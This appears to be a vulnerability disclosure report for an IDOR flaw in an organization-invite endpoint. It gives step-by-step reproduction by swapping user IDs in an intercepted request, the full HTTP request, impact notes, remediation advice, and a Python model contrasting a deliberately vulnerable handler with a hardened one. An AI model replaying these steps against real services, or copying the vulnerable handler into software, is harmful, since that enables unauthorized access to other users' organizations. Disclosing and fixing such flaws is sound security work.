
A critical Insecure Direct Object Reference (IDOR) vulnerability exists in the user invite functionality.
By manipulating the User ID parameter in the invite request, an attacker can send organization invitations on the victim's behalf and invite arbitrary accounts into the victim's org without authorization.
This results in full compromise of the victim's organization membership, allowing malicious users to join the victim's workspace.

Step 1: Login as Attacker
The attacker logs into their own valid account.
Step 2: Trigger an Invite Request
The attacker attempts to invite a user to their organization and intercepts the request using Burp Suite or any proxy tool.
Step 3: Modify the User ID
Inside the intercepted request, the User ID responsible for sending the invite is visible.
➡️ Replace:
attacker-user-id
➡️ With:
victim-user-id
Step 4: Forward the Modified Request
Send the manipulated request to the server.
✔ The attacker is now able to send an invite on behalf of the victim.
✔ The victim’s organization user invites are fully compromised.
Affected Request
POST /members/invite/victim-invited-user-id?Email=our-mail-id HTTP/2
Host: example.com
Cookie: cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Xsrf-Token: itcXTIrRd15LT1NljWk8zPliHXmDcPTUWejP6HaKeQY
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: https://example.com
Sec-Gpc: 1
Referer: https://example.com/user/connections
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: close
Email=1q%40q.om&AgentID=1008352&UserAgentID=327822

Impact
Unauthorized invitations sent on behalf of other users
Account takeover possibilities
Organization-level access abuse
Trust boundary violation
Potential lateral movement within the platform
Recommended Fix
✅ Enforce server-side authorization checks
✅ Validate ownership of UserID before processing requests
✅ Never trust client-controlled identifiers
✅ Implement role-based access control (RBAC)
✅ Log and monitor invite activity
✅ Use UUID-based mapping instead of predictable IDs
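As an added illustration, not code from this report or from the affected platform, the following Python model shows the invite handler in its vulnerable form (organization and inviter resolved from the client-supplied path user ID) next to a hardened form that takes the identity from the authenticated session, requires the path ID to match it, checks the caller's role, and logs every decision. The user IDs, organization names and roles are constructed placeholders.

```python
# Added example (not the report's or the platform's code). Constructed in-memory
# data: user IDs, organizations and roles are placeholders chosen for illustration.
USER_ORG = {"u-attacker": "org-A", "u-victim": "org-B", "u-member": "org-A"}
ORG_MEMBERS = {"org-A": {"u-attacker": "admin", "u-member": "member"},
               "org-B": {"u-victim": "admin"}}
INVITER_ROLES = {"owner", "admin"}   # roles allowed to invite into an org
AUDIT_LOG = []                        # (event, session_user, path_user_id, org)
PENDING_INVITES = []                  # (org, invited_by, email)


def create_invite(org, inviter, email):
    PENDING_INVITES.append((org, inviter, email))
    return {"org": org, "invited_by": inviter, "email": email}


def invite_vulnerable(session_user, path_user_id, email):
    """Mirrors the IDOR: org and inviter are taken from the URL, not the session.
    The session is authenticated but never compared with path_user_id, so any
    logged-in user can act as any other user."""
    org = USER_ORG.get(path_user_id)
    if org is None:
        return 404, {"error": "unknown user"}
    return 200, create_invite(org, path_user_id, email)


def invite_fixed(session_user, path_user_id, email):
    """Hardened handler: identity and org are resolved from the authenticated
    session; the path ID must match it and the caller must hold an inviting role."""
    # 1. Never trust the client-controlled identifier.
    if path_user_id != session_user:
        AUDIT_LOG.append(("REJECT_ID_MISMATCH", session_user, path_user_id, None))
        return 403, {"error": "forbidden"}
    # 2. Resolve the org from the session and enforce the caller's role (RBAC).
    org = USER_ORG.get(session_user)
    role = ORG_MEMBERS.get(org, {}).get(session_user)
    if role not in INVITER_ROLES:
        AUDIT_LOG.append(("REJECT_ROLE", session_user, path_user_id, org))
        return 403, {"error": "forbidden"}
    # 3. Record successful invites so unusual invite activity is visible to monitoring.
    AUDIT_LOG.append(("INVITE", session_user, path_user_id, org))
    return 200, create_invite(org, session_user, email)
```

Both handlers receive `session_user` from the authenticated session; only the hardened one actually uses it, which is the whole difference between the two.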
